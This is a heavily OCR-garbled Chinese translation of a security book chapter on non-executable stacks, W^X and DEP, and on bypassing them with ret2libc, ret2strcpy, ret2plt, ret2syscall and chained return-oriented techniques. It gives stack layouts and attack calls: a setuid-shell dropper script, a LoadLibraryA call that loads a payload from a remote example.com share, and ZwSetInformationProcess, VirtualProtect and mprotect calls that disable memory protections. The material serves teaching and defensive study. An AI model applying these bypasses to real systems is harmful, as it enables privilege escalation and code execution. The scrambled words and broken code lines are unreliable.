char buf[80]; 
int var2; 
printf("arg:$p varl:$x var2:%x buf:%x\n", &varl, &var2, buf); 
strcpy(buf, arg): 
} 


int main(int c, char **v) { 
function(v[11); 


) 
标准 的 栈 布局 没有 采用 任何 保护 机 制 或 优化 ， 看 起 来 像 下 面 这 样 。 


+ 低地 址 

Var2 4B 
buf 80B 
varl 4B 
Saved ebp 4B 


return address 4B 
arg 4B 
V 高 地 址 
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注意 ， 本 章 使 用 的 显示 模式 与 调试 器 一 样 ， 低 地 址 显示 在 页 面 上 方 。 


14.11 不 可 执行 栈 

迄今 为 止 ， 最 常见 的 安全 bug 仍 是 基于 栈 的 缓冲 区 溢出 。 最 常见 的 破解 它们 的 方法 是 : 把 代 
码 放 在 栈 上 ， 在 被 溢出 的 同一 缓冲 区 里 ， 改 写 返回 地 址 ， 最 后 跳 到 它 。 通 过 使 栈 不 可 执行 ， 这 种 
破解 技术 就 失效 了 。 

1996 年 8 月 , 有 人 在 bugtraq 里 提 及 运行 在 Alpha 上 的 DEC 公司 的 Digital UNIX 的 不 可 执行 栈 ( 简 
写 为 nx-stack) Chttp://marc.info?m=87602167419750), 尽管 它 在 1999 年 2 月 之 前 可 能 只 是 不 稽 之 谈 
Chttp://mare.info?m=919547 16313516), 但 它 的 出 现 可 能 是 推动 Casper Dik 在 1996 年 9 月 19 日 创建 并 
发 布 一 个 令 人 难以 置信 的 shell 脚 本 的 动力 ， 这 个 脚本 可 以 在 运行 时 修补 内 核 ， 从 而 在 Solaris 
2.4/2.5/2.5.1 上 实现 了 nx-stack (http://seclists.org/bugtraq/1996/Nov/0057.html)。 随 后 ， 在 1997 年 4 
月 12 日 , Solar Designer 发 布 了 他 为 Linux 提 供 的 第 一 个 补丁 (http://marc.info?m=87602167420762)。 
然而 ， 从 目前 的 研究 看 来 ， 这 些 实现 还 不 是 最 早 的 ，14.2 节 将 详细 介绍 这 一 情况 。 

在 很 长 一 段 时 间 内 ，Intel 架 构 都 不 接受 不 可 执行 栈 ， 但 是 今天 ， 在 大 多 数 的 Linux 发 行 版 、 
OpenBSD. Mac OS X、Solaris、Windows 等 系统 里 面 ， 这 个 特征 都 被 默认 启用 了 。 

在 nx-stack 机 制 出 现 后 ， 几 乎 立即 就 有 人 想 出 了 一 些 技术 来 绕 过 它 。 所 有 这 些 技术 都 依靠 一 
个 非常 简单 的 事实 ;只 将 栈 标记 为 不 可 执行 ， 这 样 代 码 在 其 他 地 方 〈《 比 如 在 堆 上 ) 仍 可 以 执行 ， 
此 外 ， 改 写 返 回 地 址 仍 是 难以 检测 的 夺取 脆弱 应 用 程序 执行 流 的 有 效 手段 。 

一 个 称 为 eturm-into-libce〈 简 写 为 ret2libc) 的 技术 最 早 开始 在 nx-stacks 中 利用 基于 栈 的 缓冲 区 
溢出 。ret2libe 后 来 陆续 被 改良 为 ret2plt、 ret2strcpy、 ret2gets、 ret2syscall、 ret2data、 ret2text. ret2code. 
ret2dl-resolve 和 chained ret2code (或 称 为 chained ret2libc) ER. 

当 Tim Newsham 在 1997 年 4 月 27 日 第 一 次 发 表 关 于 这 个 主题 的 帖子 时 ， 甚 至 是 在 Linux 上 第 一 
个 nx-stack 出 现 之 前 ， 他 脑子 里 明显 有 很 多 想法 (http:/marc.info?m=87602167420860)， 但 又 过 了 
一 段 时 间 ， 第 一 个 具体 的 例子 及 利用 程序 才 浮 出 水 面 之 前 。 

QO ret2data。 绕 过 nx-stack 的 最 简单 的 方法 是 ， 把 注入 的 代码 egg / shellcode 放 到 数据 段 里 ， 

使 用 恶化 的 返回 地 址 跳 到 它 。 当 然 ， 当 被 溢出 的 缓冲 区 在 栈 上 时 ， 攻 击 者 需要 另外 找 一 
个 把 代码 放 在 内 存 里 的 方法 。 这 样 的 方法 有 几 个 ， 例 如 ， 缓 冲 VO 使 用 堆 来 保存 数据 。 

a ret2libc。 在 1997 年 4 月 10 日 ，Solar Designer 在 一 封 发 往 bugtraq 的 电子 邮件 里 对 此 做 了 说 明 
(http:/marcinfo?m=-87602746719512)。 主 要 意思 是 ， 使 用 直接 跳 到 libc 代 码 的 返回 地 址 ， 
例如 ，UNIX 上 的 system() 、WinExec() ， 或 者 像 David Litchfield 指 出 的 Windows 上 的 
LoadLibraryA() (http:/www.ngssoftware.com/research/papers/xpms.pdf)。 在 栈 缓 冲 区 游 
出 里 ， 攻 击 者 可 以 控制 整个 栈 帧 ， 其 中 包括 返回 地 址 或 任何 可 以 被 当 作 函数 返回 参数 的 
东西 ， 因 此 ， 用 攻击 者 选择 的 参数 调用 libc 里 指定 的 函数 是 有 可 能 的 。 主 要 限制 是 有 效 字 
符 的 范围 〈 例 如 ， 十 分 常见 的 '\x00' 就 不 能 被 注入 )。 

O ret2strcpy 。 在 1998 年 1 月 30 日 ，Rafal Wojtczuk 公 开 了 此 技术 (http://marc.info?m= 
88645450313378)。 尽 管 这 个 技术 也 是 基于 ret2libc 的 ， 但 它 赋 予 攻击 者 运行 任意 代码 的 能 
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力 。 这 个 简单 但 很 巧妙 的 主意 是 ， 用 指向 栈 缓 冲 区 〈 或 内 存 里 任何 其 他 的 地 址 ) 代码 的 
src 参数 以 及 指向 选择 的 可 写 和 可 执行 内 存 地 址 的 ast 参 数 返 回 strcpy() 。 通 过 控制 整个 
栈 帧 ， 攻 击 者 可 以 控制 strcpy() 返 回 哪里 ， 从 而 跳 到 已 经 用 stzcpy() 把 代码 复制 到 那里 
的 内 存 地 址 ， 即 可 执行 任意 代码 。 当 然 ， 用 其 他 合适 的 函数 同样 可 以 达到 这 样 的 效果 ， 


如 sprintf()、memcpy () 等 。 


t 低地 址 . 

&strcpy 4B， 与 改写 的 返回 地 址 一 臻 
dest_ret 4B， 执 行 strcpy () 之 后 的 目标 地 址 
dest 4B， 已 知 的 可 写 并 且 可 执行 的 地 址 
src 4B， 必 须 指向 注入 的 代码 

V 高 地 址 


尽管 作为 源 参数 传递 的 指针 好 像 必 须 精确 地 指向 代码 , 但 是 较 小 的 nop 垫 允许 用 近似 的 地 
址 成 功 执行 代码 。8.9 节 介绍 了 Windows 平 台 上 使 用 ret2strepy 的 例子 。 

ret2gets. Ariel Futoransky 的 最 爱 ， 它 与 ret2strcpy 非 常 类 似 , 但 在 正确 的 条 件 下 更 加 可 靠 ， 
因为 除 可 写 的 地 址 及 放置 注入 代码 的 可 执行 内 存 外 ， 它 不 再 需要 任何 其 他 的 参数 。 

当然 ， 像 gets () 从 stdin 读 取 数 据 一 样 ， 你 必须 可 以 控制 应 用 程序 的 输入 ， 但 这 对 大 多 
数 本 地 利用 和 一 些 远程 的 ， 特 别 是 对 通过 inetd 或 类 似 东西 启动 的 应 用 程序 来 说 ， 这 太 容 
易 了 。 其 他 的 函数 还 有 read() 、recv() 、recvfrom() 等 。 尽 管 必须 猜 出 正确 的 文件 描述 
符 参数 ， 但 是 如 果 它 足够 大 ， 也 可 以 忽略 count。 


+ 低地 址 

&gets 4B， 与 改写 的 返回 地 址 对 齐 

dest 4B, #fTgets () 后 的 目标 地 址 
dest 4B， 已 知 的 可 写 并 且 可 执行 的 地 址 
i 高 地 址 


ret2code。 这 是 一 个 通称 ， 代 表 所 有 不 同 的、 破解 已 经 存在 于 应 用 程序 中 的 代码 的 方法 。 
它 可 能 是 应 用 程序 里 一 些 攻击 者 感 兴趣 的 “真实 的 ”代码 ， 或 者 只 是 一 些 已 有 代码 的 片 
段 ， 就 像 已 经 解释 的 一 些 例 子 。 

chained ret2code。 也 称 为 chained ret2libc。 这 个 概念 并 没有 一 个 很 清晰 的 说 明 ， 在 1997 
年 ， 它 曾 以 ret2syscall 的 简单 形式 使 用 过 ， 但 第 一 次 被 John McDonald 公 开演 示 其 全 部 潜能 
是 在 1999 年 3 月 3 日 〈http://marc.info?m=92047779607046)， 在 一 个 针对 SPARC 上 的 Solaris 
的 真实 破解 程序 里 。 后 来 ,在 2000 年 5 月 6 日 (http:/seclists.org/bugtraq/2000/May/0090.html)， 
Tim Newsham 在 针对 x86 上 的 Solaris 的 破解 程序 里 又 展示 过 它 。 在 2001 年 12 月 27 日 ，Rafal 
Woijtczukin 在 Phrack 杂 志 上 发 表 的 文章 里 《http://phrack.org/archives/58/p58-0x04)， 对 此 种 
技术 在 Linux 上 的 应 用 做 了 细致 入 微 的 解释 。 

在 Inter x86 上 ， 有 4 项 技术 可 以 实现 chained ret2code。 

ma 第 一 项 技术 是 ， 设 法 把 栈 指针 移 到 用 户 可 控制 的 缓冲 区 里 ， 就 像 Tim Newsham 的 破解 程 
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序 所 做 的 那样 。 

和 第 二 项 技术 是 ， 调 整 在 每 个 函数 返回 后 的 栈 指针 ， 例 如 ， 使 用 pop-pop-pop-pop-ret 
这 样 的 序列 。 

a 当 返 回 用 pascal 或 stacall 调 用 约定 实现 的 函数 时 ,就 像 Windows 里 使 用 的 , 第 三 项 技 
术 是 唯一 的 选择 。 对 于 这 些 调 用 约定 ， 被 调用 者 将 在 返回 时 整理 栈 ， 留 下 它 对 执行 接 
下 来 的 chained 调 用 再 好 不 过 了 。 这 种 形式 的 chained ret2code 简 单 易 用 ,为 破解 提供 了 非 
常 多 的 可 能 性 。 

最 后 一 项 用 于 chained re2code 的 技术 是 John McDonald 用 于 SPARC 的 技术 ， 虽 然 它 非常 
依赖 于 SPARC 的 特性 ， 但 它 与 刚刚 解释 的 第 三 项 技术 有 些 关 系 。 

ret2syscall。 这 项 技术 我 们 已 经 提 过 了 ， 是 在 1997 年 4 月 28 日 ，Tim Newsham 在 bugtraq 发 

表 的 帖子 里 提出 并 解释 的 (http:/marc.info/?m=87602167420860)。 对 于 使 用 寄存 器 作为 系 

统 调用 参数 的 系统 来 说 ， 比 如 Linux， 必 须 在 代码 里 找 出 两 个 不 同 的 参数 ， 并 把 它们 链 在 

一 起 。 第 一 项 必须 从 栈 上 弹出 所 有 需要 的 寄存 器 ， 然 后 返回 。 

pop eax 

pop ebx 

pop ecx 

ret 


第 二 个 片段 简单 地 执行 系统 调试 就 可 以 了 。 通 过 控制 栈 ， 攻 击 者 控制 弹出 的 寄存 器 。 和 
ret2strcpy 类 似 ， 必 须 设 置 来 自 第 一 个 片段 的 返回 地 址 ， 从 而 使 它 返 回 第 二 个 片段 并 开始 
执行 系统 调用 。 

在 其 他 那些 通过 栈 传递 系统 调用 参数 的 操作 系统 上 ， 把 调用 链 成 一 串 是 非常 简单 的 。 只 
需 为 第 一 个 代码 片段 设置 一 个 寄存 器 (例如 , X Windows. OpenBSD, FreeBSD, Solaris/x86, 
Mac OSX 来 说 ，eax 必 须 被 设 成 系统 调用 编号 )， 第 二 个 片段 则 只 需 执行 系统 调用 。 
尽管 在 Windows 上 只 用 系统 调用 编写 代码 是 可 能 的 ， 但 就 像 Piotr Bania 在 2005 年 8 月 4 日 在 
他 的 文章 “Windows Syscall Shellcode” Chttp://www.securityfocus.com/infocus/1844) 里 解 
释 的 那样 ， 以 ret2syscall 的 方式 来 实现 仍 有 待 证 明 。 

ret2text。 这 是 对 跳 进 可 执行 二 进 制 本 身 的 .text 段 〈 代 码 段 ) 方法 的 总 称 。ret2plt 和 
ret2d-lresolve 是 它 的 两 个 特例 。 随 着 像 W^X 和 ASLR 之 类 的 保护 机 制 的 增加 ，ret2text 攻 击 
将 变 得 日 益 重 要 ， 后 文 即将 详细 介绍 。 

ret2plt 。 在 1998 年 1 月 30 日 ，Rafal Wojtczuk 阐 述 了 这 项 技术 〔http://marc.info?m= 
88645450313378)。 为 了 防范 ret2libc 攻 击 ，Solar Designer 在 1997 年 4 月 10 日 提出 把 库 移 到 
ASCI Armored Address Space (AAAS) (http://marc.info?m=87602746719512), 因为 AAAS 
的 地 址 范围 中 包含 一 个 '\x00' (例如 ，0x00110000)， 因 此 在 strcpy () 发 生 溢 出 时 可 以 
防范 ret2libc 攻 击 。 

ret2plt 通 过 二 进 制 的 Procedure Linkage Table (PLT) 间接 调用 libc 函 数 。PLI 是 一 个 跳 转 表 ， 
程序 使 用 的 每 一 个 库 函 数 在 里 面 都 有 一 个 对 应 的 条 目 , 对 那些 动态 链接 的 ELF 可 执行 文件 
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来 说 ， 它 们 在 内 存 里 的 表示 不 会 被 重 定位 到 AAAS。 
这 项 技术 的 主要 局 限 是 : 它 只 能 调用 目标 二 进 制 曾 使 用 过 的 函数 ， 否 则 就 没有 PLT 条 目 。 


t 低地 址 

&strcpy@plt 4B，strcpy 函 数 PLT 条 目的 地 址 
dest ret 4B, dAfTstrcpy () 后 的 目标 地 址 
dest 4B， 已 知 的 可 写 并 且 可 执行 地 址 
src 4B， 必 须 指向 注入 的 代码 

| 高 地 址 


ret2dl-resolve。 不 得 不 再 次 提 到 Rafal Wojtczuk， 他 在 前 面 提 到 的 Phrack 文 章 里 也 解释 了 
ELF 的 动态 链接 器 解析 符 〈1la.soe) 怎样 返回 代码 ， 从 而 利用 没有 被 二 进 制 使 用 的 库 函 数 
执行 ret2plt 攻 击 。 

a 当 ELF 格 式 的 二 进 制 文件 被 执行 时 ， 除 非 指 定 了 LD_BIND_Now， 否 则 它 所 有 的 PLT 条 目 
都 将 指向 为 被 调用 函数 动态 解析 地 址 的 代码 ， 更 新 一 些 信息 ， 从 而 在 第 二 次 调用 时 不 
必 再 次 解析 符号 就 可 以 调用 函数 了 。 所 有 这 些 进入 点 在 逻辑 上 都 是 单一 的 函数 (在 Linux 
中 是 al_LIinux_resolve()， 在 OpenBSD 和 FreeBSD 上 是 _dl_pind_start() ), 使 用 一 
个 额外 的 参数 就 可 以 滥用 这 个 函数 调用 动态 函数 库 里 的 任何 函数 。 

和 为 这 些 函数 确定 参数 可 不 是 件 简单 的 事情 ， 但 是 ， 就 像 Rafal 所 演示 的 那样 ， 它 绝对 是 
可 行 的 。 建 议 你 仔细 阅读 这 篇 文章 ， 理 解 怎样 实现 这 项 技术 。 

我 们 在 前 面 曾经 提 到 过 ，nx-stack 作 为 保护 机 制 来 说 主要 有 两 个 弱点 : 它 仍 允 许 滥用 返回 地 
址 ， 从 而 使 执行 流 可 以 转 到 任意 位 置 ， 如 果 只 有 它 自己 《就 是 说 ， 没 有 其 他 的 保护 机 制 )， 则 它 
既 不 能 预防 已 存在 于 进程 内 存 里 的 代码 的 执行 ， 也 不 能 预防 注入 到 其 他 数据 区 的 代码 的 执行 。 我 
们 将 在 下 文中 讲述 其 他 的 保护 技术 解决 这 些 问题 的 方法 。 

14.1.2. W^X 内 存 

它 是 不 可 执行 栈 的 合理 扩展 , 由 使 可 写 内 存 不 可 执行 和 使 可 执行 内 存 不 可 写 两 部 分 组 成 。 有 
了 WA^X， 从 理论 上 讲 ， 向 脆弱 的 程序 注入 外 部 代码 将 变 得 不 可 能 。 不 幸 地 是 ， 前 面 介绍 的 方法 除 
ret2data、ret2strcpy 和 ret2gets 外 ， 其 他 的 都 可 以 攻击 只 用 WA^X 保 护 的 系统 。 

W^X (Writable xoreXecutable， 不 可 写 或 执行 ) 这 个 名 字 是 由 OpenBSD 的 奠基 者 及 主 架构 师 
Theo de Raadt 提 出 的 , 尽管 在 此 之 前 已 经 有 它 的 实现 了 。W^X 的 第 一 个 实现 可 以 追溯 到 1972 年 (或 
许 更 早 一 些 )。 基 于 GE-645 的 Multics 系 统 支 持 把 内 存 段 设 为 可 读 、 可 写 和 可 执行 ， 系 统 里 面 也 使 
用 了 硬件 保护 。 有 两 篇 非常 好 的 文章 描述 了 Multics 系 统 的 安全 特性 、 漏 洞 、 破 解 程序 和 后 门 ， 在 
网 上 可 以 找到 这 两 篇 文章 : 1974 年 6 月 ，Paul Karger 和 Roger Schell 发 表 的 “Multics Security © 
Evaluation: Vulnerability Analysis" Chttp://csrc.nist.gov/publications/history/karg74.pdf); 2002 年 12 
月 ， 仍 是 上 面 两 个 作者 发 表 的 “Thirty Years Later: Lessons from the Multics Security Evaluation” 


Chttp://www.acsac.org/2002/papers/classic-multics.pdf) 。 
现在 ， 这 些 文章 的 内 容 可 能 已 经 被 大 多 数 人 和 遗 在 了 ， 我 们 还 是 介绍 一 下 1996 年 Casper Dik C 
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布 的 不 可 执行 补丁 吧 ， 它 不 仅 使 栈 不 可 执行 ， 而 且 也 使 bss 段 不 可 执行 。 其 后 涌现 了 多 种 W^X 实 
现 ， 但 第 一 个 有 较 大 影响 的 或 许 是 pipacs 于 2000 年 10 月 28 日 发 布 的 Linux 的 修正 〈 称 为 Pax) 
(http://marc.info?m=97288542204811)。 它 最 初 只 能 用 在 Intel x86 硬 件 上 ， 但 现在 由 grsecurity 正 式 
维护 ， 已 经 可 以 支持 x86、sparc、sparc64、alpha、parisc、amd64、ia64 和 ppx 上 的 Linux。 

PaX 是 第 一 个 证 明了 与 流行 看 法 相左 的 实现 ， 它 使 人 们 认识 到 ， 在 Intel x86 便 件 上 实现 不 可 执行 
内 存 页 是 可 能 的 。 然而， 尽管 这 项 技术 可 以 工作 , 但 为 了 更 保守 的 实现 ， 人 们 后 来 又 对 它 做 了 修改 。 

主流 的 Linux 发 行 版 里 从 来 都 不 带 PaX， 很 可 能 是 考虑 到 性 能 、 可 维护 性 和 其 他 非 安全 性 等 
原因 ， 尽 管 现在 大 多 数 的 发 行 版 中 或 多 或 少 都 可 以 看 到 W^X 的 影子 。 

在 2003 年 9 月 ，AMD 率先 为 不 可 执行 内 存 页 提供 了 片上 支持 ， 这 就 是 被 称 为 NX 
(Non-eXecutable) 的 特性 ，Intel 随 即 也 提供 了 非常 类 似 的 称 为 EBD (Execute Disable) 的 特性 。 几 
个 月 后 , 就 已 经 有 Linux 补 丁 利 用 这 些 特性 了 。 又 过 了 不 久 , 微软 公司 受 NX 位 的 启发 , 为 Windows 
XP 发 布 的 SP2 也 引入 了 DEP (Data Execution Prevention， 数 据 执行 保护 机 制 )。 






Windows WA^X 默 认 是 可 选 的 
随 着 Windows XP SP2 和 Windows 2003 SP1 的 发 布 ， 微 软 公司 使 用 了 DEP 技 术 。 理 解 它 及 它 
的 默认 配置 是 理解 在 特定 情形 里 选用 哪 种 破解 技术 的 关键 。 

DEP 通 常 分 成 两 个 不 同 的 组 件 : 硬件 实现 和 软件 实现 。 不 过 ， 真 正 说 起 来 ， 它 至 少 有 三 个 
不 同 的 组 成 部 分 : SafeSEH (software Safe Structured Exception Handling) 实现 ， 在 14.1.7 节 中 
会 有 说 明 ; 对 WA^X 的 硬件 NX 支 持 ; 以 及 一 些 仅 支持 W^X 的 软件 ， 这 同样 依赖 于 异常 调度 
(exception dispatching) ， 在 14.1.7 节 中 会 解释 。 

对 于 使 用 Visual Studio /SafeSEH 选 项 编译 的 可 执行 应 用 程序 (EXE) 和 动态 链接 库 (DLL) 
来 说 ，SafeSEH Protections 总 是 启用 的 。 没 有 禁用 这 些 保护 的 全 局 选项 ， 对 于 没有 用 /SafeSEH 
选项 编译 的 应 用 程序 ( 像 现在 市 场 上 大 多 数 的 第 三 方 软件 及 一 些 老 的 应 用 程序 ) 来 说 ,也 没有 
办 法 启用 它们 。 

在 64 位 硬件 架构 上 ,每 个 应 用 程序 都 启用 了 硬件 支持 的 DEP 和 W^X, 按照 官方 文档 的 说 法 ， 
不 能 禁用 它们 。 

对 于 使 用 硬件 和 软件 W^X 保 护 的 32 位 系统 来 说 , 可 以 用 同一 组 选项 控制 它们 , 也 可 以 全 局 
禁用 、 启 用 它们 ,或 者 针对 特殊 的 应 用 程序 有 选择 性 地 启用 或 禁用 它们 。 像 http://www.microsoft. 
com/technet/security/prodtech/windowsxp/depcnfxp.mspx 里 描述 的 那样 ， 在 默认 情况 下 ， 只 有 特 
殊 的 Windows 系统 组 件 和 服务 会 启用 W^X， 其 他 的 应 用 程序 都 会 禁用 它 。 

从 攻击 者 的 角度 来 看 ， 默 认 的 配置 意味 着 ,除非 他 把 菜 个 受 特殊 保护 的 Windows 应 用 程序 
作为 目标 ， 否 则 他 将 可 以 在 数据 段 里 运行 代码 ， 包 括 那些 有 和 没有 硬件 NX 支 持 系 统 里 的 堆 和 
栈 。 甚 至 在 默认 情况 下 每 个 进程 都 启用 DEP 的 配置 里 ， 一 些 进程 照样 可 以 不 爱 约 束 ，Mozilla 
Thunderbird 邮 件 客户 端 在 运行 时 就 脱离 了 DEP。 





当 W^X 完 全 实现 时 ， 对 于 注入 外 来 代码 的 攻击 来 说 ， 它 将 是 一 个 非常 有 效 的 保护 手段 ， 然 
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而 ， 这 并 不 意味 着 它 就 是 代码 执行 利用 的 终结 者 。 

在 栈 缓冲 区 溢出 情形 里 ， 对 执行 大 多 数 的 攻击 来 说 ， 使 用 chained ret2code 就 可 以 了 ， 但 是 在 
研究 带 或 不 带 W^X 的 情形 下 ， 通 过 外 部 代码 注入 来 执行 任意 代码 是 否 真 的 不 可 能 还 是 十 分 有 趣 
的 。 首 先 ， 需 要 回答 一 些 问 题 。 

a 应 用 程序 里 有 我 们 需要 的 代码 吗 ? 如 果 有 ， 人 简单 的 ret2code 就 足够 了 。 

o Ai EIBUW-X (Writable 和 Executable) 吗 ? 如 果 有 ，ret2strcpy 或 ret2gets 可 能 就 足够 了 。 

a 用 chained ret2code 把 一 个 可 执行 文件 写 到 磁盘 然后 执行 它 有 多 复杂 ? 

指向 文件 名 的 指针 并 不 重要 ， 任 何 文件 名 可 能 都 可 以 。 然 而 ， 对 于 写 到 文件 的 可 执行 映 
像 来 说 ， 你 需要 一 个 指针 ， 而 且 要 把 它 作 为 攻击 的 一 部 分 来 发 送 。 然 后 ， 你 就 可 以 调用 
setuid(0)、open()、write()、close()、system() /execve() /等 所 有 链 在 一 起 的 函 
数 ， 更 重要 的 是 ， 把 由 open () 返 回 的 文件 描述 符 传递 给 write() 和 close()， 这 可 能 有 些 
复杂 。 为 了 解决 这 个 难题 ， 你 可 以 猜测 文件 描述 符 ， 或 者 使 用 dup2 () HEK A open 0 的 返 
回 值 链接 一 次 ， 并 选择 固定 的 文件 描述 符 作为 目标 。 实 际 上 ， 需 要 通过 chained ret2code 
来 完成 ， 用 C 可 以 表示 如 下 : 

setuid(0); 

dup2 (open("filename",O_RDWR | O CREAT, 0755), 123); 

write(123, &executable_image, sizeof (executable_image)); 


close(123); 
system("filename"); 


尽管 这 个 方法 在 技术 上 是 可 行 的 ， 但 我 们 可 能 需要 链接 非常 多 的 调用 ， 需 要 放 一 些 零 在 
参数 里 ， 需 要 一 些 函 数 的 精确 地 址 和 映像 文件 的 地 址 ， 这 可 能 有 些 复杂 。 为 了 解决 最 后 
的 问题 ， 垫 片 法 〈cushion solution) 或 许 行 得 通 ， 例 如 ， 使 用 像 下 面 这 样 的 shell 脚 本 : 


#!/bin/sh 
#!/bin/sh 
#!/bin/sh 
#!/bin/sh 





#!/bin/sh 

#!/bin/sh 

#!/bin/sh 

#1/bin/sh 

id 

ep /bin/sh /tmp/suidsh 
chmod 4755 /tmp/suidsh 


这 里 最 主要 的 是 允许 重复 的 模式 (pattern)， 不 必 为 可 执行 映像 猜测 完美 的 地 址 。 可 以 用 
这 个 模式 尽 可 能 地 填充 目标 的 内 存 ， 从 而 触发 #1/bin/sh。 当 然 , 这 并 不 是 唯一 可 能 的 执 


片 法 。 
在 Windows 上 ， 被 调用 的 链 简 短 且 简单 ， 因 为 没有 参数 需要 到 处 传递 : 
RevertToSelf(); 


302 


D 


Li 


$143 保护 机 制 


或 者 ， 如 果 可 以 在 被 看 作 与 可 破解 的 应 用 程序 同样 的 进程 里 执行 代码 ， 单 个 调用 可 能 就 
够 了 : 

LoadLibraryA("\\example.com\payload.exe"); 

如 果 给 定 的 破解 程序 中 没有 可 用 的 ret2code 选 项 ， 仍 存在 执行 注入 代码 的 可 能 性 ， 

有 方法 可 以 关 掉 这 个 保护 吗 ? 

在 Windows 上 , 至 少 一 直到 Vista， 可 以 用 下 面 这 样 的 单个 库 函 数 调用 禁用 进程 的 NX 检 查 ; 
ZwSetInformationProcess(-1, 22, "\x32\x00\x00\x00", 4); 

这 个 调用 将 在 内 核 进程 对 象 里 设置 Executeoptions， 从 而 允许 在 进程 内 存 的 任何 地 方 执 
行 代码 ，eEye 的 Ben Nagy 详 细 介 绍 了 这 个 内 容 (http://www.eeye.com/html/resources/ 
newsletters/vice/VI20060830.html)。 笔 者 已 经 分 别 测 试 了 带 硬 件 NX 支 持 和 不 带 硬件 NX 支 
持 的 情形 。 

调用 里 的 第 三 值 必须 是 一 个 指向 整数 的 指针 , 它 唯一 的 需求 是 位 1 被 置 位 , 位 7~15 被 清 零 。 
这 就 提供 了 很 多 选择 ， 例 如 ， 一 个 简单 的 方法 是 重用 在 内 存 里 的 MZ 头 部 ， 把 它 作为 已 知 
的 字 节 源 ， 可 以 是 : 

ZwSetInformationProcess(-1, 0x22, 0x400004 4); 

如 果 你 的 破解 程序 降服 不 了 0x400004 中 的 空 字 节 ， 可 以 选择 内 存 里 其 他 二 进 制 的 MZ 头 
部 ， 但 是 你 可 能 仍 会 碰 到 问题 ， 因 为 其 他 的 参数 肯定 有 包含 0 的 。 

对 未 受 保护 的 整个 进程 来 说 ，ret2ntdll 攻 击 的 栈 布局 和 下 面 显示 的 差不多 。 


+ 低地 址 

0x7c90e62d 4B, XP SP2'f' f j&zwSetInformationProcess 
&code 4B， 未 受 保护 内 存 中 的 地 址 

Oxffffffff 4B 

0x22 4B 

0x400004 4B 

4 4B 

+ 高 地 址 


另 一 个 办 法 是 在 ntdal1.dl1 中 找 出 禁用 这 个 保护 所 需要 的 精确 的 代码 。 如 果 有 具备 正确 的 条 
件 ， 返 回 0x7c92d3fa 或 者 接近 它 。 对 于 禁用 这 个 保护 然后 跳 到 其 他 地 方 来 说 ， 这 样 做 可 
能 已 足够 了 。 

Windows Vista 里 有 一 段 更 合适 的 代码 ， 但 它 在 DLL 中 的 地 址 是 随机 的 ， 因 此 ， 它 可 能 没 
什么 用 处 查看 位 于 _LdrpcheckNXCompatibility@4+45c85 处 的 代码 )。 

可 以 把 特殊 的 内 存 区 从 WAX 改 成 W+X 取 ?如 果 可 以 ， 你 可 以 执行 一 个 小 的 chained 
ret2code， 把 它 标 为 可 执行 ， 然 后 跳 到 它 那 里 。 

在 Windows 里 面 ， 把 一 些 区 域 标 成 W+X 是 有 可 能 的 ; 

VirtualProtect (addr, size, 0x40, writable_address); 


我 们 想 将 其 变 成 可 执行 的 地 址 必须 位 于 adqdqr 和 size 指 定 范围 内 的 页 里 。 如 果 范 围 跨越 了 
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不 同 的 内 存 段 ， 也 没什么 关系 ， 只 要 它 已 经 完全 映射 到 内 存 里 即 可 。 

在 OpenBSD 上 ， 把 内 存 区 变 成 W+X 也 是 可 能 的 。 在 这 种 情形 下 ， 调 用 mprotect () 就 可 以 
T: 

mprotect (addr, size, 7); 

在 Intel x86 平 台 上 ，OpenBSD 一 直到 4.1 版 本 都 使 用 段 限 定 (segment limit) 标记 不 可 执行 
内 存 ， 反 对 使 用 较 新 的 NX/PAE 扩 展 。 在 这 样 的 设置 里 ， 把 一 些 东西 标 成 可 执行 的 唯一 方 
法 是 ， 把 它们 映射 到 较 低 的 、 可 执行 的 内 存 地 址 ， 因 此 ， 下 面 的 代码 将 取消 进程 的 整个 
内 存 上 的 W^X: 

mprotect(Oxcfbf0101, OxOfffffff, 7); 

注意 ， 并 不 一 定 非 要 一 个 W+X 段 ， 根 据 使 用 的 代码 ， 使 它 可 执行 时 移 走 写 权限 可 能 就 足 
够 了 。 后 一 种 情形 是 X after W， 与 W+X 相 对 应 。 在 允许 X after W 但 不 允许 W+X 的 地 方 ， 
可 能 有 其 他 的 实现 。 

在 Linux 上 ， 如 果 安 装 了 PaX， 这 个 方法 将 失效 。PaX 根 本 就 不 允许 把 内 存 页 变 为 W+X 或 X 
after W。 然 而 ， 如 果 安 装 了 Red Hat 的 ExecShield， 就 可 以 使 用 类 似 OpenBSD 技 术 的 方法 。 
当 对 不 存在 的 区 域 执行 mprotect () 时 ，Linux 的 内 核 的 限制 更 多 ， 必 须 向 mprotect () 提 
供 一 个 有 效 的 完全 与 4KB 内 存 对 齐 的 地 址 。 类 似 的 方法 是 在 内 存 的 顶部 的 可 执行 页 执行 
mmap () : 

mmap(Oxbffff000, Ox1000, 7, 0x32, 0, 0); 

mmap (0 的 参数 不 需要 很 精确 。 例 如 ， 文 件 描述 符 参数 随意 ， 大 小 不 必 是 4KB 的 倍数 ， 偏 
移 量 可 以 是 4KB 的 任意 倍数 ， 等 等 。 

可 能 有 这 样 的 情形 ， 只 有 少数 段 可 以 被 改 成 X after W。 在 这 样 的 情形 里 ， 必 须 首先 把 代 
码 复制 到 可 写 的 段 里 ， 然 后 使 它 可 执行 ， 最 后 跳 到 它 那里 。 这 将 需要 额外 的 类 似 于 
ret2strcpy 或 ret2gets 中 的 第 一 步 ， 生 成 称 之 为 strcpy-mprotect-code 的 代码 。 

如 果 没 有 可 以 设 成 W+X 的 内 存 地 址 ， 我 们 可 以 创建 新 的 W+X 区 域 吗 ? 

再 次 声明 ， 如 果 安 装 了 PaX， 就 不 要 妄想 了 ， 但 在 其 他 的 系统 上 ， 包 括 Windows、Linux 
和 OpenBSD， 它 是 有 可 能 实现 的 。 在 Windows 上 必须 使 用 VirtualAlloc ()， 在 Unix 上 要 
用 mmap () 。 在 分 配 W+X 段 后 ， 你 可 能 想 把 注入 代码 复制 到 里 面 ， 最 后 跳 到 那里 ， 因 此 ， 
只 能 用 带 有 两 个 完整 函数 调用 的 chained ret2code 方 法 ， 最 后 返回 注入 的 代码 。 它 与 
mmap-strcpy-code 一 样 o 


”所 有 这 些 选 项 需要 至 少 控制 一 个 栈 帧 ， 这 在 栈 缓冲 区 溢出 情形 里 可 以 得 到 ， 但 在 像 堆 组 


冲 区 溢出 或 格式 化 串 bug 的 情形 里 ， 就 没有 那么 容易 了 〈 如 果 有 可 能 )。 当 通过 改写 某 些 
